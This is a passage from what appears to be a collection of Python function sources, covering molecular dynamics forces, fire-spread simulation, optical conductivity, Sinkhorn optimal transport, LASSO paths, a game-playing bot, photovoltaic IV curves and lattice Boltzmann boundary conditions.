r[ki,:]-r[kj,:] # Separation vector\n rij[0] = rij[0] - np.rint(rij[1])*strain # Extra correction in box=1 units\n rij = rij - np.rint(rij) # Periodic boundary conditions in box=1 units\n rij_sq = np.sum(rij**2) # Squared separation\n\n if rij_sq < r_cut_box_sq: # Check within cutoff\n rij_sq = rij_sq * box_sq # Now in sigma=1 units\n rij = rij * box # Now in sigma=1 units\n sr2 = 1.0 / rij_sq # (sigma/rij)**2\n ovr = sr2 > sr2_ovr # Overlap if too close\n sr6 = sr2 ** 3\n sr12 = sr6 ** 2\n pot = sr12 - sr6 # LJ potential (cut but not shifted)\n vir = pot + sr12 # LJ virial\n pot = pot + 0.25 # WCA LJ potential (cut-and-shifted)\n lap = ( 22.0*sr12 - 5.0*sr6 ) * sr2 # LJ Laplacian\n fij = rij * vir * sr2 # LJ forces\n pyx = rij[1]*fij[0] # Off-diagonal element of pressure tensor\n total = total + PotentialType ( pot=pot, vir=vir, pyx=pyx, lap=lap, ovr=ovr )\n f[ki,:] = f[ki,:] + fij\n f[kj,:] = f[kj,:] - fij\n\n # Multiply results by numerical factors\n f = f * 24.0 # 24*epsilon\n total.pot = total.pot * 4.0 # 4*epsilon\n total.vir = total.vir * 24.0 / 3.0 # 24*epsilon and divide virial by 3\n total.pyx = total.pyx * 24.0 # 24*epsilon\n total.lap = total.lap * 24.0 * 2.0 # 24*epsilon and factor 2 for ij and ji\n \n return total, f", "def run_model(f_grid, h_grid, i_threshold, w_direction, burn_seeds):\n \n burnt_cells = burn_seeds\n \n # a list of all the cells to iterate over\n cell_list = []\n for i in range(len(f_grid)):\n for j in range(len(f_grid)):\n cell = (i, j)\n cell_list.append(cell)\n \n # create a mutable burning grid to be refered to in check_ignition function\n b_grid = []\n for i in range(len(f_grid)):\n b_grid.append([])\n for j in range(len(f_grid)):\n b_grid[i].append(False)\n for cell in cell_list:\n if cell in burn_seeds:\n b_grid[cell[0]][cell[1]] = True\n \n \n while test_bool(b_grid) is True:\n \n # lists for how the cells are currently behaving so that next_t and \n # check ignition can iterate through the same values for every cell in \n # each time frame\n current_fuel = copy_list(f_grid)\n current_burning = copy_list(b_grid)\n \n # generate scenario in the next time frame\n next_t(cell_list, current_burning, b_grid, current_fuel, f_grid, \n h_grid, i_threshold, w_direction, burnt_cells)\n \n return f_grid, len(burnt_cells)", "def non_interacting_conductivity(self,\n sigma=0.04,\n freq_range=(0.0, 6.0, 1000),\n imag_dielectric=False,\n broadening='lorentz'):\n cell_area = np.abs(float(np.cross(self.a1, self.a2)))*len(self.k_grid)\n broad_fnc = get_broadening_function(broadening, sigma)\n\n frequency_grid = np.linspace(*freq_range)\n energy_increment = np.abs(frequency_grid[1] - frequency_grid[0])\n num_freqs, min_freq = len(frequency_grid), min(frequency_grid)\n output_grid = np.zeros(num_freqs)\n\n energy_power = 1 + int(imag_dielectric)\n prefactor = e_charge_2_over_epsilon0 if imag_dielectric else 1\n prefactor = prefactor/cell_area\n\n # Assuming x polarisation for now\n position_dipole_matrix = self.construct_position_dipole_matrix()\n\n n_shift = self.n_spins*self.n_orbs\n for idx1, kpt in enumerate(self.k_grid):\n for s0 in range(self.n_spins):\n velocity_matrix = self.load_velocity_matrix(idx1)\n bands = self.exciton_obj.get_number_conduction_valence_bands(\n idx1, s0\n )\n v_num, c_num = bands\n eigvals = np.array(\n self.file_storage['eigensystem']['eigenvalues'][idx1]\n )\n\n j1 = n_shift*idx1 + (self.n_spins - 1)*s0*self.n_orbs\n j2 = j1 + self.n_orbs\n eigvecs = np.array(\n self.file_storage['eigensystem']['eigenvectors'][j1:j2, :]\n )\n for v, c in product(range(v_num), range(c_num)):\n cb_vector = eigvecs[:, v_num + c]\n vb_vector = eigvecs[:, v]\n cb_energy, vb_energy = eigvals[v_num + c], eigvals[v]\n energy_diff = (cb_energy - vb_energy)\n\n energy_diff_pow = energy_diff**energy_power\n matrix_elem = velocity_matrix_element(vb_vector,\n cb_vector,\n velocity_matrix)\n if self.use_dipole_term:\n position_dipole_term = get_position_dipole_element(\n vb_vector,\n cb_vector,\n vb_energy,\n cb_energy,\n position_dipole_matrix\n )\n matrix_elem = matrix_elem + position_dipole_term\n\n main_term = np.abs(matrix_elem)**2/energy_diff_pow\n closest_idx = (energy_diff - min_freq)//energy_increment\n idx_reach = self.reach_multiplier*(sigma//energy_increment)\n\n lower_idx = max([closest_idx - idx_reach, 0])\n upper_idx = min([closest_idx + idx_reach, num_freqs - 1])\n\n for idx2 in range(int(lower_idx), int(upper_idx)):\n smearing = broad_fnc(energy_diff, frequency_grid[idx2])\n output = prefactor*main_term*smearing\n output_grid[idx2] += output\n\n return frequency_grid, output_grid", "def mbieLoop (self) :\n self.iterCnt = 0\n while self.iterCnt < 5000:\n s = self.mdp.s0\n for h in range(self.H) :\n self.QUpper = QBoundsSolver(self.mdp, self.PHat, self.QUpper, self.Ntotal, 0.1, True, self.stop)\n a = np.argmax(self.QUpper[s])\n s_, self.R[s,a] = self.mdp.step(s, a)\n self.updateVisitStatistics(s, a, s_)\n s = s_\n\n if self.iterCnt % 10 == 0: \n print(self.iterCnt)\n print(self.QUpper)\n\n self.iterCnt += 1", "def set_bc(self, problem):\n bcs = problem.bcs\n n_bound = cfg.const['N_GHOST_CELLS']\n # Left X-b.c.\n for i in range(0, self.i_min):\n for j in range(self.j_min, self.j_max):\n for k in range(self.k_min, self.k_max): \n if bcs[0] == 't': \n self.U[i][j][k] = self.U[self.i_min][j][k]\n elif bcs[0] == 'w':\n for num in [0, 2, 3, 4]: # 0 -> 3, 1 -> 2, i_min-1 -> i_min, i_min-2 -> i_min+1\n self.U[i][j][k][num] = self.U[self.i_min + (self.i_min - i - 1)][j][k][num]\n for num in [1]:\n self.U[i][j][k][num] = - self.U[self.i_min + (self.i_min - i - 1)][j][k][num]\n else:\n print(\"Errof field.set_ics(): only wall-type and transmissive boundaries supported! Bye!\")\n # Right X-b.c.\n for i in range(self.i_max, self.i_max+n_bound):\n for j in range(self.j_min, self.j_max):\n for k in range(self.k_min, self.k_max): \n if bcs[1] == 't':\n self.U[i][j][k] = self.U[self.i_max-1][j][k]\n elif bcs[1] == 'w':\n for num in [0, 2, 3, 4]: # i_max -> i_max-1 , i_max+1-> i_max-2\n self.U[i][j][k][num] = self.U[self.i_max - (i - self.i_max + 1)][j][k][num]\n for num in [1]:\n self.U[i][j][k][num] = - self.U[self.i_max - (i - self.i_max + 1)][j][k][num]\n else:\n print(\"Error field.set_ics(): only wall-type and transmissive boundaries supported! Bye!\")\n # Left Y-b.c.\n for i in range(0, self.i_max+n_bound):\n for j in range(0, self.j_min):\n for k in range(self.k_min, self.k_max): \n if bcs[2] == 't':\n self.U[i][j][k] = self.U[i][self.j_min][k]\n elif bcs[2] == 'w':\n for num in [0, 1, 3, 4]:\n self.U[i][j][k][num] = self.U[i][self.j_min + (self.j_min - j - 1)][k][num]\n for num in [2]:\n self.U[i][j][k][num] = - self.U[i][self.j_min + (self.j_min - j - 1)][k][num]\n else:\n print(\"Error field.set_ics(): only wall-type and transmissive boundaries supported! Bye!\")\n # Right Y-b.c.\n for i in range(0, self.i_max+n_bound):\n for j in range(self.j_max, self.j_max+n_bound):\n for k in range(self.k_min, self.k_max): \n if bcs[3] == 't':\n self.U[i][j][k] = self.U[i][self.j_max-1][k]\n elif bcs[3] == 'w':\n for num in [0, 1, 3, 4]:\n self.U[i][j][k][num] = self.U[i][self.j_max - (j - self.j_max + 1)][k][num]\n for num in [2]:\n self.U[i][j][k][num] = -self.U[i][self.j_max - (j - self.j_max + 1)][k][num]\n else:\n print(\"Error field.set_ics(): only wall-type and transmissive boundaries supported! Bye!\")\n # Left Z-b.c.\n for i in range(0, self.i_max+n_bound):\n for j in range(0, self.j_max+n_bound):\n for k in range(0, self.k_min): \n if bcs[4] == 't':\n self.U[i][j][k] = self.U[i][j][self.k_min]\n elif bcs[4] == 'w':\n for num in [0, 1, 2, 4]:\n self.U[i][j][k][num] = self.U[i][j][self.k_min + (self.k_min - k - 1)][num]\n for num in [3]:\n self.U[i][j][k][num] = - self.U[i][j][self.k_min + (self.k_min - k - 1)][num]\n else:\n print(\"Error field.set_ics(): only wall-type and transmissive boundaries supported! Bye!\")\n # Right Z-b.c.\n for i in range(0, self.i_max+n_bound):\n for j in range(0, self.j_max+n_bound):\n for k in range(self.k_max, self.k_max+n_bound):\n if bcs[5] == 't':\n self.U[i][j][k] = self.U[i][j][self.k_max-1]\n elif bcs[5] == 'w':\n for num in [0, 1, 2, 4]:\n self.U[i][j][k][num] = self.U[i][j][self.k_max - (k - self.k_max + 1)][num]\n for num in [3]:\n self.U[i][j][k][num] = - self.U[i][j][self.k_max - (k - self.k_max + 1)][num]\n else:\n print(\"Error field.set_ics(): only wall-type and transmissive boundaries supported! Bye!\")", "def inner_loop(b_i, b_ij, phi_ij, psi_i, lambda_ij, gamma_ij, N):\n # Compute energy\n dual_E = compute_dual_energy(b_i, phi_ij, psi_i, lambda_ij, gamma_ij, N)\n conv_crit = numpy.inf\n\n while conv_crit > 1e-10:\n # Until not converged update lagrange multipliers\n lambda_ij = update_lambda(b_i, phi_ij, psi_i, lambda_ij, gamma_ij, N)\n gamma_ij = update_gamma(phi_ij, lambda_ij, N)\n # Compute dual energy\n dual_E_old = dual_E\n dual_E = compute_dual_energy(b_i, phi_ij, psi_i, lambda_ij, gamma_ij, N)\n conv_crit = (dual_E_old - dual_E) / dual_E_old\n\n # Return\n return lambda_ij, gamma_ij", "def bypass_conds(self):\n for block in self.get_basic_blocks_followed_by_branches():\n constants = collect_constant_assigns(block.statements)\n branch = block.outgoing_edge[0]\n cond = deepcopy(branch.cond)\n cond = specialize_constants(cond, constants)\n try:\n if eval(astor.to_source(cond), silica.operators):\n # FIXME: Interface violation, need a remove method from blocks\n branch.true_edge.incoming_edges.add((block, \"\"))\n block.outgoing_edges = {(branch.true_edge, \"\")}\n else:\n branch.false_edge.incoming_edges.add((block, \"\"))\n block.outgoing_edges = {(branch.false_edge, \"\")}\n branch.incoming_edges.remove((block, \"\"))\n except NameError as e:\n # print(e)\n pass", "def regularize_bwd(X, y, mu0, mu1, v1, nz, K, verbose=False):\n \n if verbose: sss=0#print '\\ncompute bath between mu=%.4f and mu=%.4f'%(mu0, mu1)\n \n n, m = X.shape\n X_nz = np.atleast_2d(X[:, nz])\n b = np.dot(X.T, y)\n G = np.dot(X.T, X)\n \n nbr = 0\n mu = mu0\n trans_type = -1\n trans_sign = 0\n trans_ind = -1\n if verbose: nbr=0#print 'initial active features =', nz\n \n while mu > mu1:\n \n # find the breakpoints where coefficients become zero\n b_nz = b[nz]\n Kv1 = np.dot(K, v1)\n Kb_nz = np.dot(K, b_nz)\n mu_0 = Kb_nz / Kv1\n \n # find the breakpoints where new coefficients become active\n z = np.setdiff1d(np.arange(m), nz)\n X_z = np.atleast_2d(X[:, z])\n b_z = b[z]\n M = G[np.ix_(z, nz)]\n MKb_nz = np.dot(M, Kb_nz)\n MKv1 = np.dot(M, Kv1)\n mu_1 = (b_z - MKb_nz) / (1 - MKv1)\n mu_m1 = (b_z - MKb_nz) / (-1 - MKv1)\n \n if trans_type > 0: mu_0[-1] = mu1\n mu_0[mu_0 >= mu] = mu1\n if len(mu_0) > 0: \n mu_0_argmax = mu_0.argmax()\n mu_0_max = mu_0[mu_0_argmax][0]\n else:\n mu_0_max = mu1\n if trans_type == 0:\n if trans_sign == 1: mu_1[np.where(z == trans_ind)[0]] = mu1 - 1\n else: mu_m1[np.where(z == trans_ind)[0]] = mu1 - 1\n mu_1[mu_1 >= mu] = mu1\n if len(mu_1) > 0: \n mu_1_argmax = mu_1.argmax()\n mu_1_max = mu_1[mu_1_argmax][0]\n else:\n mu_1_max = mu1\n mu_m1[mu_m1 >= mu] = mu1\n if len(mu_m1) > 0: \n mu_m1_argmax = mu_m1.argmax()\n mu_m1_max = mu_m1[mu_m1_argmax][0]\n else:\n mu_m1_max = mu1\n \n # compute the breakpoint\n mu_br_all = np.array([mu_0_max, mu_1_max, mu_m1_max])\n trans_type = mu_br_all.argmax()\n mu_br = mu_br_all[trans_type]\n \n if mu_br > mu1:\n \n nbr += 1\n mu = mu_br\n \n if trans_type == 0: # an element of theta(t) goes to zero\n trans_ind = nz[mu_0_argmax]\n trans_sign = v1[mu_0_argmax]\n if verbose: sss=0#print 'transition point :: mu = %.4f :: feature %d is inactive'%(mu, trans_ind)\n nzind = range(len(nz))\n rr=np.where(nz==trans_ind)[0][0]\n #print 'longa:',len(nz),len(nzind),len(v1)\n #print 'c:',nz.index(trans_ind)\n nzind=np.delete(nzind,rr)#nzind=np.delete(nzind,np.where(nzind==nz.index(trans_ind)))#nzind.remove(nz.index(trans_ind))\n v1 = v1[nzind]\n nz=np.delete(nz,rr)#nz=np.delete(nz,np.where(nz==trans_ind))#nz.remove(trans_ind)\n #print 'longa2:',len(nz),len(nzind),len(v1)\n X_nz = X[:, nz]\n K = invupdatered(K, mu_0_argmax)\n else: # new active element\n if trans_type == 1: # it is positive\n trans_ind = z[mu_1_argmax]\n if verbose: sss=0#print 'transition point :: mu = %.4f :: feature %d is positive'%(mu, trans_ind)\n nz=np.append(nz,trans_ind)#nz.append(trans_ind)\n v1 = np.vstack([v1, 1])\n else: # it is negative\n trans_ind = z[mu_m1_argmax]\n if verbose: sss=0#print 'transition point :: mu = %.4f :: feature %d is negative'%(mu, trans_ind)\n nz=np.append(nz,trans_ind)#nz.append(trans_ind)\n v1 = np.vstack([v1, -1])\n X_new = np.atleast_2d(X[:, trans_ind]).T\n K = invupdateapp(K, np.dot(X_nz.T, X_new), np.dot(X_new.T, X_nz), \n np.dot(X_new.T, X_new))\n X_nz = X[:, nz]\n \n else: # compute solution at mu1\n \n if verbose: sss=0#print 'compute solution at mu =', mu1\n theta_nz = Kb_nz - mu1*Kv1\n mu = mu1\n \n return theta_nz, nz, K, nbr", "def _sinkhorn_iterations(\n tau_a: float,\n tau_b: float,\n inner_iterations: int,\n min_iterations: int,\n max_iterations: int,\n momentum_default: float,\n chg_momentum_from: int,\n lse_mode: bool,\n implicit_differentiation: bool,\n threshold: float,\n norm_error: Sequence[int],\n geom: geometry.Geometry,\n a: jnp.ndarray,\n b: jnp.ndarray) -> Tuple[jnp.ndarray, jnp.ndarray, jnp.ndarray]:\n\n # Defining the Sinkhorn loop, by setting initializations, body/cond.\n num_a, num_b = geom.shape\n if lse_mode:\n f_u, g_v = jnp.zeros_like(a), jnp.zeros_like(b)\n else:\n f_u, g_v = jnp.ones_like(a) / num_a, jnp.ones_like(b) / num_b\n\n errors = -jnp.ones((np.ceil(max_iterations / inner_iterations).astype(int),\n len(norm_error)))\n const = (geom, a, b, threshold)\n\n def cond_fn(iteration, const, state):\n threshold = const[-1]\n errors = state[0]\n err = errors[iteration // inner_iterations-1, 0]\n\n return jnp.logical_or(iteration == 0,\n jnp.logical_and(jnp.isfinite(err), err > threshold))\n\n def get_momentum(errors, idx):\n \"\"\"momentum formula, https://arxiv.org/pdf/2012.12562v1.pdf, p.7 and (5).\"\"\"\n error_ratio = jnp.minimum(errors[idx - 1, -1] / errors[idx - 2, -1], .99)\n power = 1.0 / inner_iterations\n return 2.0 / (1.0 + jnp.sqrt(1.0 - error_ratio ** power))\n\n def body_fn(iteration, const, state, compute_error):\n \"\"\"Carries out sinkhorn iteration.\n\n Depending on lse_mode, these iterations can be either in:\n - log-space for numerical stability.\n - scaling space, using standard kernel-vector multiply operations.\n\n Args:\n iteration: iteration number\n const: tuple of constant parameters that do not change throughout the\n loop, here the geometry and the marginals a, b.\n state: potential/scaling variables updated in the loop & error log.\n compute_error: flag to indicate this iteration computes/stores an error\n\n Returns:\n state variables, i.e. errors and updated f_u, g_v potentials.\n \"\"\"\n geom, a, b, _ = const\n errors, f_u, g_v = state\n\n # compute momentum term if needed, using previously seen errors.\n w = jax.lax.stop_gradient(jnp.where(iteration >= (\n inner_iterations * chg_momentum_from + min_iterations),\n get_momentum(errors, chg_momentum_from),\n momentum_default))\n\n # sinkhorn updates using momentum, in either scaling or potential form.\n if lse_mode:\n new_g_v = tau_b * geom.update_potential(f_u, g_v, jnp.log(b),\n iteration, axis=0)\n g_v = (1.0 - w) * jnp.where(jnp.isfinite(g_v), g_v, 0.0) + w * new_g_v\n\n new_f_u = tau_a * geom.update_potential(f_u, g_v, jnp.log(a),\n iteration, axis=1)\n f_u = (1.0 - w) * jnp.where(jnp.isfinite(f_u), f_u, 0.0) + w * new_f_u\n else:\n new_g_v = geom.update_scaling(f_u, b, iteration, axis=0) ** tau_b\n g_v = jnp.where(g_v > 0, g_v, 1) ** (1.0 - w) * new_g_v ** w\n\n new_f_u = geom.update_scaling(g_v, a, iteration, axis=1) ** tau_a\n f_u = jnp.where(f_u > 0, f_u, 1) ** (1.0 - w) * new_f_u ** w\n\n # re-computes error if compute_error is True, else set it to inf.\n err = jnp.where(\n jnp.logical_and(compute_error, iteration >= min_iterations),\n marginal_error(geom, a, b, tau_a, tau_b, f_u, g_v, norm_error,\n lse_mode),\n jnp.inf)\n\n errors = jax.ops.index_update(\n errors, jax.ops.index[iteration // inner_iterations, :], err)\n return errors, f_u, g_v\n\n # Run the Sinkhorn loop. choose either a standard fixpoint_iter loop if\n # differentiation is implicit, otherwise switch to the backprop friendly\n # version of that loop if using backprop to differentiate.\n\n if implicit_differentiation:\n fix_point = fixed_point_loop.fixpoint_iter\n else:\n fix_point = fixed_point_loop.fixpoint_iter_backprop\n\n errors, f_u, g_v = fix_point(\n cond_fn, body_fn, min_iterations, max_iterations, inner_iterations, const,\n (errors, f_u, g_v))\n\n f = f_u if lse_mode else geom.potential_from_scaling(f_u)\n g = g_v if lse_mode else geom.potential_from_scaling(g_v)\n\n return f, g, errors[:, 0]", "def ml_loop(side: str):\n\n # === Here is the execution order of the loop === #\n # 1. Put the initialization code here\n ball_served = False\n blocker_last_x = 0\n\n class Pred:\n pred = 100\n blocker_pred_x = 0\n last_command = 0\n blocker_vx = 0\n\n \n def move_to(player, pred) : #move platform to predicted position to catch ball \n if player == '1P':\n if scene_info[\"platform_1P\"][0]+20 > (pred-10) and scene_info[\"platform_1P\"][0]+20 < (pred+10): return 0 # NONE\n elif scene_info[\"platform_1P\"][0]+20 <= (pred-10) : return 1 # goes right\n else : return 2 # goes left\n else :\n if scene_info[\"platform_2P\"][0]+20 > (pred-10) and scene_info[\"platform_2P\"][0]+20 < (pred+10): return 0 # NONE\n elif scene_info[\"platform_2P\"][0]+20 <= (pred-10) : return 1 # goes right\n else : return 2 # goes left\n\n def ml_loop_for_1P(): \n # ball slicing\n if scene_info[\"ball_speed\"][1] > 0 and (scene_info[\"ball\"][1]+scene_info[\"ball_speed\"][1]) >= 415 and Pred.last_command == 0:\n print(\"------\")\n ball_x = scene_info[\"ball\"][0]\n ball_y = scene_info[\"ball\"][1]\n ball_vx = scene_info[\"ball_speed\"][0]\n ball_slice_vx = scene_info[\"ball_speed\"][0]+np.sign(scene_info[\"ball_speed\"][0])*3\n ball_vy = scene_info[\"ball_speed\"][1] \n blocker_x = scene_info['blocker'][0] + Pred.blocker_vx\n \n y = abs((415 - ball_y) // ball_vy)\n pred_ball_1P = ball_x + ball_vx * y\n\n y = abs((415 - 260) // ball_vy)\n pred_ball_blocker = pred_ball_1P + ball_slice_vx * y\n bound = pred_ball_blocker // 200 # Determine if it is beyond the boundary\n if (bound > 0): # pred > 200 # fix landing position\n if (bound%2 == 0) : \n pred_ball_blocker = pred_ball_blocker - bound*200 \n else :\n pred_ball_blocker = 200 - (pred_ball_blocker - 200*bound)\n elif (bound < 0) : # pred < 0\n if (bound%2 ==1) :\n pred_ball_blocker = abs(pred_ball_blocker - (bound+1) *200)\n else :\n pred_ball_blocker = pred_ball_blocker + (abs(bound)*200)\n \n y = abs((415 - 260) // ball_vy)\n Pred.blocker_pred_x = blocker_x + Pred.blocker_vx * y \n if Pred.blocker_pred_x < 0: Pred.blocker_pred_x = abs(Pred.blocker_pred_x)\n elif Pred.blocker_pred_x > 170: Pred.blocker_pred_x = 170 - (Pred.blocker_pred_x - 170)\n \n if pred_ball_blocker >= Pred.blocker_pred_x-10 and pred_ball_blocker < Pred.blocker_pred_x+40:\n print(\"slice will hit blicker\")\n # don't slice \n # use origin ball vx to predict will hit blocker or not\n # if will hit blicker let ball go reverse direction\n y = abs((415 - 260) // ball_vy)\n pred_ball_blocker = pred_ball_1P + ball_vx * y\n bound = pred_ball_blocker // 200 # Determine if it is beyond the boundary\n if (bound > 0): # pred > 200 # fix landing position\n if (bound%2 == 0) : \n pred_ball_blocker = pred_ball_blocker - bound*200 \n else :\n pred_ball_blocker = 200 - (pred_ball_blocker - 200*bound)\n elif (bound < 0) : # pred < 0\n if (bound%2 ==1) :\n pred_ball_blocker = abs(pred_ball_blocker - (bound+1) *200)\n else :\n pred_ball_blocker = pred_ball_blocker + (abs(bound)*200)\n\n if pred_ball_blocker >= Pred.blocker_pred_x-10 and pred_ball_blocker < Pred.blocker_pred_x+40:\n print(\"will hit blocker, hit reversed direction\")\n if scene_info[\"ball_speed\"][0] > 0: return 2\n else: return 1\n else: \n print(\"will not hit blicker, do nothing\")\n return 0\n else:\n # slice\n print(\"slice will not hit blocker\")\n if scene_info[\"ball_speed\"][0] > 0: return 1\n else: return 2\n\n elif scene_info[\"ball_speed\"][1] > 0 : # 球正在向下 # ball goes down\n x = ( scene_info[\"platform_1P\"][1]-scene_info[\"ball\"][1] ) // scene_info[\"ball_speed\"][1] # 幾個frame以後會需要接 # x means how many frames before catch the ball\n Pred.pred = scene_info[\"ball\"][0]+(scene_info[\"ball_speed\"][0]*x) # 預測最終位置 # pred means predict ball landing site \n bound = Pred.pred // 200 # Determine if it is beyond the boundary\n if (bound > 0): # pred > 200 # fix landing position\n if (bound%2 == 0) : \n Pred.pred = Pred.pred - bound*200 \n else :\n Pred.pred = 200 - (Pred.pred - 200*bound)\n elif (bound < 0) : # pred < 0\n if (bound%2 ==1) :\n Pred.pred = abs(Pred.pred - (bound+1) *200)\n else :\n Pred.pred = Pred.pred + (abs(bound)*200)\n return move_to(player = '1P',pred = Pred.pred)\n \n else : # 球正在向上 # ball goes up\n return move_to(player = '1P',pred = 100)\n\n\n\n def ml_loop_for_2P(): # as same as 1P\n if scene_info[\"ball_speed\"][1] > 0 : \n return move_to(player = '2P',pred = 100)\n else : \n x = ( scene_info[\"platform_2P\"][1]+30-scene_info[\"ball\"][1] ) // scene_info[\"ball_speed\"][1] \n pred = scene_info[\"ball\"][0]+(scene_info[\"ball_speed\"][0]*x) \n bound = pred // 200 \n if (bound > 0):\n if (bound%2 == 0):\n pred = pred - bound*200 \n else :\n pred = 200 - (pred - 200*bound)\n elif (bound < 0) :\n if bound%2 ==1:\n pred = abs(pred - (bound+1) *200)\n else :\n pred = pred + (abs(bound)*200)\n return move_to(player = '2P',pred = pred)\n\n # 2. Inform the game process that ml process is ready\n comm.ml_ready()\n\n # 3. Start an endless loop\n while True:\n # 3.1. Receive the scene information sent from the game process\n scene_info = comm.recv_from_game()\n\n # 3.2. If either of two sides wins the game, do the updating or\n # resetting stuff and inform the game process when the ml process\n # is ready.\n if scene_info[\"status\"] != \"GAME_ALIVE\":\n # Do some updating or resetting stuff\n ball_served = False\n\n # 3.2.1 Inform the game process that\n # the ml process is ready for the next round\n comm.ml_ready()\n continue\n\n # 3.3 Put the code here to handle the scene information\n\n # 3.4 Send the instruction for this frame to the game process\n if not ball_served:\n comm.send_to_game({\"frame\": scene_info[\"frame\"], \"command\": \"SERVE_TO_LEFT\"})\n blocker_last_x = scene_info[\"blocker\"][0]\n Pred.last_command = 0\n ball_served = True\n else:\n if side == \"1P\":\n Pred.blocker_vx = scene_info[\"blocker\"][0] - blocker_last_x\n if scene_info[\"blocker\"][0] == 0: Pred.blocker_vx = 5\n elif scene_info[\"blocker\"][0] == 170: Pred.blocker_vx = -5\n command = ml_loop_for_1P()\n blocker_last_x = scene_info[\"blocker\"][0]\n Pred.last_command = command\n else:\n command = ml_loop_for_2P()\n\n if command == 0:\n comm.send_to_game({\"frame\": scene_info[\"frame\"], \"command\": \"NONE\"})\n elif command == 1:\n comm.send_to_game({\"frame\": scene_info[\"frame\"], \"command\": \"MOVE_RIGHT\"})\n else :\n comm.send_to_game({\"frame\": scene_info[\"frame\"], \"command\": \"MOVE_LEFT\"})", "def check_termination(self):\r\n \r\n # First check if we are doing termination based on running time\r\n if (self.options.time_limit):\r\n self.time = time.clock - self.time_start\r\n if (self.time >= self.options.maxtime):\r\n self.term_reason = 'Exceeded time limit'\r\n return\r\n \r\n # Now check if we are doing break by tolx\r\n if (self.options.use_tolx):\r\n if (np.sqrt(cua.dot(self.dx,self.dx).get())/\r\n np.sqrt(cua.dot(self.oldx,self.oldx).get()) < self.options.tolx):\r\n self.term_reason = 'Relative change in x small enough'\r\n return\r\n \r\n # Are we doing break by tolo (tol obj val)\r\n if (self.options.use_tolo and self.iter > 2):\r\n delta = abs(self.obj-self.oldobj)\r\n if (delta < self.options.tolo):\r\n self.term_reason ='Relative change in objvalue small enough'\r\n return\r\n\r\n # Check if change in x and gradient are small enough\r\n # we don't want that for now\r\n# if (np.sqrt((cua.dot(self.dx,self.dx).get())) < self.options.tolx) \\\r\n# or (np.sqrt(cua.dot(self.dg,self.dg).get()) < self.options.tolg):\r\n# self.term_reason = '|x_t+1 - x_t|=0 or |grad_t+1 - grad_t| < 1e-9'\r\n# return\r\n \r\n # Finally the plain old check if max iter has been achieved\r\n if (self.iter >= self.options.maxiter):\r\n self.term_reason = 'Maximum number of iterations reached'\r\n return\r\n \r\n # KKT violation\r\n if (self.options.use_kkt):\r\n if np.abs(np.sqrt(cua.dot(self.x,self.grad).get())) <= options.tolk:\r\n self.term_reason = '|x^T * grad| < opt.pbb_gradient_norm'\r\n return\r\n \r\n # Gradient check\r\n if (self.options.use_tolg):\r\n nr = cua.max(cua.fabs(self.grad)).get();\r\n if (nr < self.options.tolg):\r\n self.term_reason = '|| grad ||_inf < opt.tolg'\r\n return\r\n \r\n # No condition met, so return false\r\n self.term_reason = 0;", "def _simulate_all_cells(self):\n for ID in tqdm(self.condition_dict, desc='Simulating cells'):\n for n in range(len(self.condition_dict[ID])):\n cond_dict = self.condition_dict[ID][n]\n g, tc, rsh_mult, rs_mult, Io_mult, Il_mult, nnsvth_mult = cond_dict['E'], cond_dict['Tc'], cond_dict[\n 'Rsh_mult'], cond_dict['Rs_mult'], cond_dict['Io_mult'], cond_dict['Il_mult'], cond_dict['nnsvth_mult']\n # calculate the 5 parameters for each set of cell conditions\n\n # Eventually, replace this with derived 5-parameters\n iph, io, rs, rsh, nnsvth = pvlib.pvsystem.calcparams_cec(effective_irradiance=g, temp_cell=tc,\n alpha_sc=self.cell_parameters['alpha_sc'],\n a_ref=self.cell_parameters['a_ref'],\n I_L_ref=self.cell_parameters['I_L_ref'],\n I_o_ref=self.cell_parameters['I_o_ref'],\n R_sh_ref=self.cell_parameters['R_sh_ref'],\n R_s=self.cell_parameters['R_s'],\n Adjust=self.cell_parameters['Adjust'])\n rs, rsh, io, iph, nnsvth = rs * rs_mult, rsh * \\\n rsh_mult, io * Io_mult, iph * Il_mult, nnsvth * nnsvth_mult\n\n # calculate cell IV curves by condition, rather than by cell index\n voc_est = pvlib.singlediode.estimate_voc(iph, io, nnsvth)\n v = voltage_pts(self.num_points_in_IV, voc_est,\n self.module_parameters['breakdown_voltage'])\n i = pvlib.singlediode.bishop88_i_from_v(v, iph, io, rs, rsh, nnsvth,\n breakdown_factor=self.module_parameters['breakdown_factor'],\n breakdown_voltage=self.module_parameters[\n 'breakdown_voltage'],\n breakdown_exp=self.module_parameters['breakdown_exp'])\n\n # @dev: Uncomment if debugging pvlib bishop88 simulation results\n # plt.plot(v,i)\n # plt.xlim(-5,v[-1])\n # plt.ylim(0,iph+1)\n # plt.title(f\"{ID}: {n} :: {rs},\"\n # f\"{rsh}, {io}, {iph}, {nnsvth}\")\n # plt.show()\n\n self.condition_dict[ID][n]['V'] = v\n self.condition_dict[ID][n]['I'] = i\n self.condition_dict[ID][n]['E'] = g\n self.condition_dict[ID][n]['Tc'] = tc\n return", "def prepare_rhs(self, simulation):\n\n nv = simulation.container.nv\n sorder = simulation.container.sorder\n nspace = [1] * (len(sorder) - 1)\n v = self.stencil.get_all_velocities()\n\n gpu_support = simulation.container.gpu_support\n\n for key, value in self.value_bc.items():\n if value is not None:\n indices = np.where(self.ilabel == key)\n # TODO: check the index in sorder to be the most contiguous\n nspace[0] = indices[0].size\n k = self.istore[0, indices]\n\n s = 1 - self.distance[indices]\n coords = tuple()\n for i in range(simulation.domain.dim):\n x = simulation.domain.coords_halo[i][self.istore[i + 1, indices]]\n x += s * v[k, i] * simulation.domain.dx\n x = x.ravel()\n for j in range(\n 1, simulation.domain.dim\n ): # pylint: disable=unused-variable\n x = x[:, np.newaxis]\n coords += (x,)\n\n m = Array(nv, nspace, 0, sorder, gpu_support=gpu_support)\n m.set_conserved_moments(simulation.scheme.consm)\n\n f = Array(nv, nspace, 0, sorder, gpu_support=gpu_support)\n f.set_conserved_moments(simulation.scheme.consm)\n\n args = coords\n if isinstance(value, types.FunctionType):\n func = value\n elif isinstance(value, tuple):\n func = value[0]\n args += value[1]\n\n if self.time_bc[key]:\n func(f, m, 0, *args)\n else:\n func(f, m, *args)\n\n simulation.equilibrium(m)\n simulation.m2f(m, f)\n\n if self.generator.backend.upper() == \"LOOPY\":\n f.array_cpu[...] = f.array.get()\n\n self.feq[:, indices[0]] = f.swaparray.reshape((nv, indices[0].size))\n\n if self.time_bc[key]:\n self.func.append(func)\n self.args.append(args)\n self.f.append(f)\n self.m.append(m)\n self.indices.append(indices[0])", "def brents(f, x0, x1, max_iter=50, tolerance=1e-5):\n \n fx0 = 